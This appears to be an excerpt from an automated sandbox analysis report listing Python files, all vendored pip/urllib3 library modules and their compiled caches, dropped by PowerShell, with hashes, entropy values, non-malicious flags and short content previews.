                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..try:. from collections.abc import Mapping, MutableMapping.except ImportError:. from collections import Mapping, MutableMapping.try:. from threading import RLock.except ImportError: # Platform-specific: No threads available.. class RLock:. def __enter__(self):. pass.. def __exit__(self, exc_type, exc_value, traceback):. pass...from collections import OrderedDict..from .exceptions import InvalidHeader.from .packages import six.from .packages.six import iterkeys, itervalues..__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"]..._Null = object()...class RecentlyUsedContainer(MutableMapping):. """. Provides a thread-safe dict-like container which maintains up to. ``maxsize`` keys while throwing away the least-recently-used keys beyond. ``maxsize``... :param maxsize:. Maximum number of recent elements to retain... :param dispose_func:. Every time an item is evicted from
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):4.806804250365621
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SbFQmvCEmqhqO2i6TAXLvsD/:SbFmEdgOH4A7sD/
                                                                                                                                                                                                                              MD5:7AC3036E582783F28D96AF250E413D81
                                                                                                                                                                                                                              SHA1:6F6F135154F47E085D6CE6E49897A4B6B6684627
                                                                                                                                                                                                                              SHA-256:6B3A0CECCEC15000E5DA406131547A3CF7F61A104323DD267B57DC9F34F075CC
                                                                                                                                                                                                                              SHA-512:98173E4FBFD3037E09EA53D212FCADA80E3C361B58238E96E1BD9F442CF13FA4222DA655AA0B780908CE08AAAE1C0894D909AA47544C18F07FF5B68822B5DDCC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is protected via CODEOWNERS.__version__ = "1.26.17".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20300
                                                                                                                                                                                                                              Entropy (8bit):4.481159129139075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:gKTqvc0xKFJCt4gYk6z1XgWcFxEbA8CBW8:uLxKFot4rHVg8o
                                                                                                                                                                                                                              MD5:7F3D2E4E6DCBE8E8C705B907A65205F7
                                                                                                                                                                                                                              SHA1:A45B9AD3EF3A0B637F31DC0CDFCF5B4EEBF44C37
                                                                                                                                                                                                                              SHA-256:F7693DB5DFF2E0F1224C88CDB9F0946B5373301DC9DF0D0B11DCA89188179D6F
                                                                                                                                                                                                                              SHA-512:DAB3B6F8B3C949AF136B4628CD76497F65CEAACEA2F62D8F44CA911F558CC8A5392ACAB229A13688FC101230F1F0D66820FA51BD87F5A2507D2ED123DA3554D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import datetime.import logging.import os.import re.import socket.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .packages import six.from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection.from .packages.six.moves.http_client import HTTPException # noqa: F401.from .util.proxy import create_proxy_ssl_context..try: # Compiled with SSL?. import ssl.. BaseSSLError = ssl.SSLError.except (ImportError, AttributeError): # Platform-specific: No SSL.. ssl = None.. class BaseSSLError(BaseException):. pass...try:. # Python 3: not a no-op, we're adding this to the namespace so it can be imported.. ConnectionError = ConnectionError.except NameError:. # Python 2. class ConnectionError(Exception):. pass...try: # Python 3:. # Not a no-op, we're adding this to the namespace so it can be imported.. BrokenPipeError = BrokenPipeError.except
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39990
                                                                                                                                                                                                                              Entropy (8bit):4.312719812694187
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:6zYeQ2AWlsVEZD+AT/35nM2m10mhQYUguRRyKFmYr:6zNQ2ADiKAT/xHeu7FFmYr
                                                                                                                                                                                                                              MD5:39DCD207110518FCE6EB9F790A1068A8
                                                                                                                                                                                                                              SHA1:44D8691BBF765CCB58F5A717E284A1023F1CD1C5
                                                                                                                                                                                                                              SHA-256:22D5436AC0E73D13CFF51F1B37163BB4F0650BBDB89C9F679715605C6FD22DB2
                                                                                                                                                                                                                              SHA-512:7D09CAA937EAD227300929FD71679AB7C908D3C6DD0B67A91276ACB65DB6BBEFAA477B7980374B5770F476DBCADB3C47E83E2F270E63C052D04838EB73E5E7C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from __future__ import absolute_import..import errno.import logging.import re.import socket.import sys.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .connection import (. BaseSSLError,. BrokenPipeError,. DummyConnection,. HTTPConnection,. HTTPException,. HTTPSConnection,. VerifiedHTTPSConnection,. port_by_scheme,.).from .exceptions import (. ClosedPoolError,. EmptyPoolError,. HeaderParsingError,. HostChangedError,. InsecureRequestWarning,. LocationValueError,. MaxRetryError,. NewConnectionError,. ProtocolError,. ProxyError,. ReadTimeoutError,. SSLError,. TimeoutError,.).from .packages import six.from .packages.six.moves import queue.from .request import RequestMethods.from .response import HTTPResponse.from .util.connection import is_connection_dropped.from .util.proxy import connection_requires_http_tunnel.from .util.queue import LifoQueue.from .util.request impor
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.659768816968569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4T5jDFK5VcK85kdVWrzLUhKBeHM7qcRwIaQHtgem/l:gl/VneT5jDw52KNdAreaeHuP6Iaatgei
                                                                                                                                                                                                                              MD5:DAA284E334A6C0DF0536765A20D4ACCC
                                                                                                                                                                                                                              SHA1:B392D5106C5D6A3FBD1ABF8BA8012BD274D21146
                                                                                                                                                                                                                              SHA-256:4953D030D026DE90F86E1A3D4828DCB6EBA1FAB6EBDDB34D18A0183E77324AAB
                                                                                                                                                                                                                              SHA-512:A2B1BA56C577D35634526B6EA2DE46F14A1663B32902D47DC4EFBF3175CA526E4A0C58BD1F8123EB31EEA94BA22CF6E213201F8E3A6D5ADF07B2F9B1C639A06D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........UC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/contrib/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1832
                                                                                                                                                                                                                              Entropy (8bit):4.931123361278996
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8UelUrqYMLbKNn+IvcN5KiInc1mOQny9UAXyLY9AlOMXEcRQ8xAlpnlQFL28il:8sXS4+IvmtIQoymVLK7MXESx6n+Bil
                                                                                                                                                                                                                              MD5:003CDA9FE202399E988E800BF84B3510
                                                                                                                                                                                                                              SHA1:4F35261D5F6B36C57DAA07CF8FF51ED824D0077F
                                                                                                                                                                                                                              SHA-256:C0B292CDEF2827E12136B9A93C92A8BA96B761143579341A1D786AA5BD22D012
                                                                                                                                                                                                                              SHA-512:C908479D54B14ABD0DAFD6E5B58A9D25925BBF83AFE5D9465CC46ACBF2FA540BCDB99AE569D498C6E4CD1671C6C5ABA9397BFD945E57DF70F70F71BE251E9E84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).zB.This module provides means to detect the App Engine environment.......Nc...........................t.................x.s...t.................S.).N)...is_local_appengine..is_prod_appengine........_C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/contrib/_appengine_environ.py..is_appenginer........s..............6.#4.#6..6r....c.....................F.....t.................x.r...t.........j...................d.....d.k(..S.).a#...Reports if the app is running in the first generation sandbox... The second generation runtimes are technically still in a sandbox, but it. is much less restrictive, so generally you shouldn't need to check for it.. see https://cloud.google.com/appengine/docs/standard/runtimes. ..APPENGINE_RUNTIME..python27).r......os..environr....r....r......is_appengine_sandboxr........s ...........>..K.b.j.j.)<..=....K..Kr....c..........................d.t.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11548
                                                                                                                                                                                                                              Entropy (8bit):5.540817894938331
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:avaftKwfPQ3T7FE7U/MgsnGugRKkUEJtaQ93:Q4tKwAj7677nGugxUE7N
                                                                                                                                                                                                                              MD5:7E9F8ECA25564BB157107BDDA37800AD
                                                                                                                                                                                                                              SHA1:BD235002AE504C4D7B4664FBC54CC814DF51ED81
                                                                                                                                                                                                                              SHA-256:840E7B4BF737C702B9832763C25CEB17DDB53D2139EFA66597A7C27BA5F0A3C5
                                                                                                                                                                                                                              SHA-512:9B7AA66E6004B55000552B295BB15FD85E79020622E47BE2FFCE42D01DD9E91E0FC8300C950BE513E214B73F279718813CA5055EC61F041569D446EE0298A35C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.+.............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z.....e.j8..................e.........Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!e.jD..................Z"e.jF..................Z#e.jH..................Z$e.jJ..................Z%e.jL..................Z&y.#.e.$.r...d.Z.Y..yw.x.Y.w.).a[....This module provides a pool manager that uses Google App Engine's.`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_...Example usage::.. from pip._vendor.urllib3 import PoolManager. from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox.. if is_appengine_sandbox():. # AppEngineManager uses AppEngine's URLFetch API behind the scenes. http = AppEngineManager(). else:. # PoolManager uses a socket-level API behind the scenes. http = PoolMa
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5703
                                                                                                                                                                                                                              Entropy (8bit):5.381298436005761
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:xqPQT6aAJ0MLFNeVprTy05bIw3GBtVTvxtVxR0AT01MADKma:+JrFNedb73GbVTvxtVxR0ATz
                                                                                                                                                                                                                              MD5:5E06D1B29FA4BCFB6E9BC90A8C233120
                                                                                                                                                                                                                              SHA1:130CED365C8B85A4E3ECC56574C8F26F229724D2
                                                                                                                                                                                                                              SHA-256:EDEA5A8C0725E6643870F82C8317F8A015DD95051BBE8417D08FB8FB02D410F8
                                                                                                                                                                                                                              SHA-512:B4CDA1A424954FDC4DC085F93F4908B6F08B36CD937900823A47F96FFF6265C1FF16A2E985C9CB212220AACF9A195097CDE13FD934C828DFD6FEAC45A132EF1B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.e.............e.e.........Z...G.d...d.e.........Z.y.).z..NTLM authenticating pool, contributed by erikcederstran..Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10......)...absolute_importN)...getLogger)...ntlm.....)...HTTPSConnectionPool)...HTTPSConnectiona#...The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed in urllib3 v2.0 release, urllib3 is not able to support it properly due to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. If you are a user of this module please comment in the mentioned issue.c.....................B.......e.Z.d.Z.d.Z.d.Z...f.d...Z.d...Z...........d...f.d...Z...x.Z.S.)...NTLMConnectionPoolzQ. Implements an NTLM authentication version of an urllib3 connection pool. ..httpsc............................t.........t.........|.....|.i.|.......|.|._.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24434
                                                                                                                                                                                                                              Entropy (8bit):5.238558221911704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:eNCkulXV/iM1oVhlmvrP2LdpX0AxDIJH/klp1y5+qXrblZetPvdE+HPZxzFG/NE:eSlXV/fOVC72LdJ0AxDIJH/klp1y5+qM
                                                                                                                                                                                                                              MD5:402520FE3535B3E5D8247823AA62DC8C
                                                                                                                                                                                                                              SHA1:DE2B29AAF522E30595F6F7ECEA1CF4C842F20A28
                                                                                                                                                                                                                              SHA-256:A7324C2B16B09705A6669E6E8878FA2303F20445920FA4660F009837CFEC66D0
                                                                                                                                                                                                                              SHA-512:1F0DC389E8DC07C996D8E188ED39410834F352029EA9FE4EB065E91C87EB6A942D416D7AD04F59EF0E3D8810C3D04228CC99E2EEE54FA23D0BFF08BBA3730717
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.B........................~.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!....e.jD..................d.e#d.............d.d.g.Z$d.Z%e.jL..................e.jN..................jP..................e!e.jN..................jP..................e.jR..................e.jN..................jT..................i.Z+..e,e.d.........r6..e,e.jN..................d.........r#e.jN..................jZ..................e+e.j\..................<.....e,e.d.........r6..e,e.jN..................d.........r#e.jN..................j^..................e+e.j`..................<.....e,e.d.........r6..e,e.jN..................d.........r#e.jN..................jb..................e+e.jd..................<...e.jf..................e.jN..................jh..................e.jj..................e.jN..................jl..................e.jn..................e.jN......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35540
                                                                                                                                                                                                                              Entropy (8bit):5.315942078843743
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:uhbIIrLn/L7gRjgaRKOhvia7j5IhCufa/BH4V96OACSKuEuIATtDhBP4ZFVl:uhbjLn/LEDf2UTnCt
                                                                                                                                                                                                                              MD5:BC65C95989C9129E4A498C8F38DBA9E6
                                                                                                                                                                                                                              SHA1:FCCC6C5F9E690387483817401E4CEE1ED01007C1
                                                                                                                                                                                                                              SHA-256:9228CF133543767DB507B2F5B861D737E2E0E1C79194BF3223341A227EDD7150
                                                                                                                                                                                                                              SHA-512:C6D834583121A6141767FE92517AF015F37A53780F634208F72080E8666015B3FB6F9705A355BA51B979564921D46F9F681A8E775334BB36868FFC2DD49BCD8E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....d.d.l.m.Z...d.d.g.Z#d.Z$e.jH..................Z%e.jL..................jN..................Z(..e.jR..........................Z*..e.jV..........................Z,d.Z-e.j\..................e.j^..................e.j`..................e.jb..................e.jd..................e.jf..................e.jh..................e.jj..................e.jl..................e.jn..................e.jp..................e.jr..................e.jt..................e.jv..................e.jx..................e.jz..................e.j|..................e.j~..................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j...................e.j.........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7495
                                                                                                                                                                                                                              Entropy (8bit):5.644024697442885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wC8PojUEqYHSBNdPwvBK1TmbNxI4httl5GdFeubYsHHsbGvlY1Y:wCyVEq/dq1bNjhttHoYuEsHHsOlYq
                                                                                                                                                                                                                              MD5:E88A725AAFCEA427AB69CF85DE6C1602
                                                                                                                                                                                                                              SHA1:ABB43C937DE47D41965E1FCF7F1492B3B9652256
                                                                                                                                                                                                                              SHA-256:F528F01EB1E1F340A2C5DE951516DAB33BDF50B9ECE9BEA0BACED81858010837
                                                                                                                                                                                                                              SHA-512:B8F8CFC629C50BFF7549268B2E4AEB2019A6C4A09A176C98626F21AA28DAA6CEBD3056D0AD3D60C79DB4888780839C6371FEE50E5946CFD021B6BFAB51D27CFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................`.....d.Z.d.d.l.m.Z.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.#.e.$.r...d.d.l.Z.d.d.l.m.Z.....e.j...................d.e.............w.x.Y.w.#.e.$.r...d.Z.Y..iw.x.Y.w.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):957
                                                                                                                                                                                                                              Entropy (8bit):4.839567597088071
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YelUQejhWpWovLFwInc1mOQny9FWvBnNI9hTLRKMLvLhTLRKMoBvLtaXP:AQejhWpvFwIQoynWvBu9hTk2hTk7pUXP
                                                                                                                                                                                                                              MD5:ACC1A179E0EC7E6C78DDF8CA298AB6C2
                                                                                                                                                                                                                              SHA1:C4CCCEC3D49682BA148AEEB6EBC8C9DC450C6A3C
                                                                                                                                                                                                                              SHA-256:6C36F2384856D8228B25C42A00A032AC41CDF9A925B321C52AAEAF17C645B269
                                                                                                                                                                                                                              SHA-512:A524C5CC746DA680F51071ECF610AAEF3AA4A58E169786C28B27D9961925461729357BE180D2D95ACC0E5B2C2456DD5D4DCE9276CC856717B5F478C9290C4732
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".This module provides means to detect the App Engine environment.."""..import os...def is_appengine():. return is_local_appengine() or is_prod_appengine()...def is_appengine_sandbox():. """Reports if the app is running in the first generation sandbox... The second generation runtimes are technically still in a sandbox, but it. is much less restrictive, so generally you shouldn't need to check for it.. see https://cloud.google.com/appengine/docs/standard/runtimes. """. return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27"...def is_local_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Development/")...def is_prod_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Google App Engine/")...def is_prod_appengine_mvms():. """Deprecated.""". return False.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.700463254286069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:gl/Vnesw52KNdAreaeHulNXELiRB6Iaatgem/l:gVeWKNnalhRBjaatHmt
                                                                                                                                                                                                                              MD5:BBC9B8A64434607950B27087E11CF8AB
                                                                                                                                                                                                                              SHA1:E374DA47BC38537F89D82907279674F5E0DB2E9D
                                                                                                                                                                                                                              SHA-256:5AC1F719E5706E46BE60436F7612106855AD94449E30BD10D7960996F29E96D3
                                                                                                                                                                                                                              SHA-512:FCD3519714186CC5565EEF5746C02FDF7B5802942F44B67B797F1E7E42B86297488C6EFBB681BEBD223567B8E30A6BD5F3A0947A680B4A91094E6202B93491E4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........fC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/urllib3/contrib/_securetransport/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17411
                                                                                                                                                                                                                              Entropy (8bit):5.743633878068513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Lc9rrrI3a93LKu/LhugQHD4kXTzdEqauAqlKsMyihT2Hq6pOqGSJkv8i1YWjGNxa:L03I3Y77/91K4oTblKsxihTIq2eYWyI
                                                                                                                                                                                                                              MD5:E4B899245038A7B8BDB17A63265A3660
                                                                                                                                                                                                                              SHA1:B215F78BE41A29833166528FBAD6397B2211A60E
                                                                                                                                                                                                                              SHA-256:366D005ED848A84A4EFEE97B86EDDC1FB1B61374FB4BE456176B3B210D525B30
                                                                                                                                                                                                                              SHA-512:62A3F172651F89508DC026747EB3EF5C5FB92C276C83AE416A2C74AFBD364B3B732742FA020E6E31CB6967629BBD2E457222D48500FE165AF6696BDAAD6ED627
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.D........................L.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j*..........................d.k7..r...e.d.............e.j...........................d.....Z...e...e.e.e.j9..................d.........................Z.e.d.k...r...e.d.e.d.......d.e.d...................d...Z...e.d.d.........Z ..e.d.d.........Z!e.Z"e.Z#e.Z$e.Z%e.Z&e.Z'e.Z(e.Z)e.Z*e.Z+e.Z,..e.e+........Z-e.Z.e.Z/..e.e%........Z0..e.e&........Z1..e.e'........Z2..e.e(........Z3..e.e)........Z4e.Z5e.Z6e.Z7..e.e.........Z8e.Z9e.Z:..e.e.........Z;e.Z<e.Z=..e.e.........Z>e.Z?e.Z@..e.e.........ZA..e.e.........ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZH..e0e1..e.e9..........e.e:........e<..e.e=........e>..e.e2........g.e j..................._J........e/e j..................._K........g.e j..................._J........e,e j..................._K........g.e j..................._J........e,e j..................._K........g.e j..................._J........e,e j.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14785
                                                                                                                                                                                                                              Entropy (8bit):5.25122614566616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:BGZU/fK3rH8N3jw2wvy+toRRVfRdPuoz7Q:BGO/fKbH8NEZtoRXPuoXQ
                                                                                                                                                                                                                              MD5:41104602FC18EBF629F211765F0D71D1
                                                                                                                                                                                                                              SHA1:899C77C3BD9CA503D0CCCF6300B38E0E363E3026
                                                                                                                                                                                                                              SHA-256:4A6F93B05BCFF610861A31A12A1BA9D0C2585100E95E5CEBEBC3C46DDB45EA92
                                                                                                                                                                                                                              SHA-512:A12320C25E2D7F8A34B3DFACFA05AEA27CAF831BE07FB69639211E87EBA8D3639CECC8C77E474E71752DA1235D155B5A5E5F210CD6274583B3D31E5E7E3D80F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfb6..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....e.j...................d.e.j...........................Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d.d.d.d.d...Z.d...Z.y.).a.....Low-level helpers for the SecureTransport bindings...These are Python functions that are not directly related to the high-level APIs.but are necessary to get them to work. They include a whole bunch of low-level.CoreFoundation messing about and memory management. The concerns in this module.are almost entirely about trying to avoid memory leaks and providing.appropriate and useful assistance to the higher-level code.......N.....)...CFConst..CoreFoundation..Securitys;...-----BEGIN CERTIFICATE-----.(.*?).-----END CERTIFICATE-----c.....................^.....t.........j...................t.........j...................|.t.........|.................S.).zv. Given a bytestring, create a CFData object
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17632
                                                                                                                                                                                                                              Entropy (8bit):5.132504932203681
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:wu/LhugQHDxJh4TH/WBO6VcdMFM4cF+V2AKkAK66qOQK+mx:1/91KxJyHuGGaW1V6hQD
                                                                                                                                                                                                                              MD5:6661DE51E1663A18B4B84CD03F030D82
                                                                                                                                                                                                                              SHA1:5DC00F4748144A2C049D1F67C1EC16C18A66F9A6
                                                                                                                                                                                                                              SHA-256:E1793AE2A2243C1B74F40E6AF9120552E0E135CF665E29556A99BB5A7627CD1C
                                                                                                                                                                                                                              SHA-512:558CB4BC7F8FF71985BC799B4A022C3DEB07B570278AF7DE4BA7D5FB027E9C7FF28277FC68A9939B8B3413942DD6DEEC614AAFA7554A9F19AF99A85B1734D6B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".This module uses ctypes to bind a whole bunch of functions and constants from.SecureTransport. The goal here is to provide the low-level API to.SecureTransport. These are essentially the C-level functions and constants, and.they're pretty gross to work with...This code is a bastardised version of the code found in Will Bond's oscrypto.library. An enormous debt is owed to him for blazing this trail for us. For.that reason, this code should be considered to be covered both by urllib3's.license and by oscrypto's:.. Copyright (c) 2015-2016 Will Bond <will@wbond.net>.. Permission is hereby granted, free of charge, to any person obtaining a. copy of this software and associated documentation files (the "Software"),. to deal in the Software without restriction, including without limitation. the rights to use, copy, modify, merge, publish, distribute, sublicense,. and/or sell copies of the Software, and to permit persons to whom the. Software is furnished to do so, sub
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13922
                                                                                                                                                                                                                              Entropy (8bit):4.614058756283462
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:4I5Kn8neLI5vXq2J+KUHEgsm6eDhmaRwJtLTc+Wn6Jz4:angeLoiKUHEgsm6eDhma/qE
                                                                                                                                                                                                                              MD5:C4CF8188919DA124CDCF69982407B298
                                                                                                                                                                                                                              SHA1:3E0A4A85C263A1269F8FD9BF290E7DDFC1806FF0
                                                                                                                                                                                                                              SHA-256:076241076FCD44FD36C4AE8309AD4F6BD22EC6B3F0C730F365B8B14246FB53D3
                                                                                                                                                                                                                              SHA-512:04AFB8BA5B06F9F92E139B5405A1E350A86A5A86D748E9D55599B1D977103B2819AD372C29BBA879F9555A883C798B31B104AE07AFF70BD9F929FD02BBE61933
                                                                                                                                                                                                                              Malicious:false
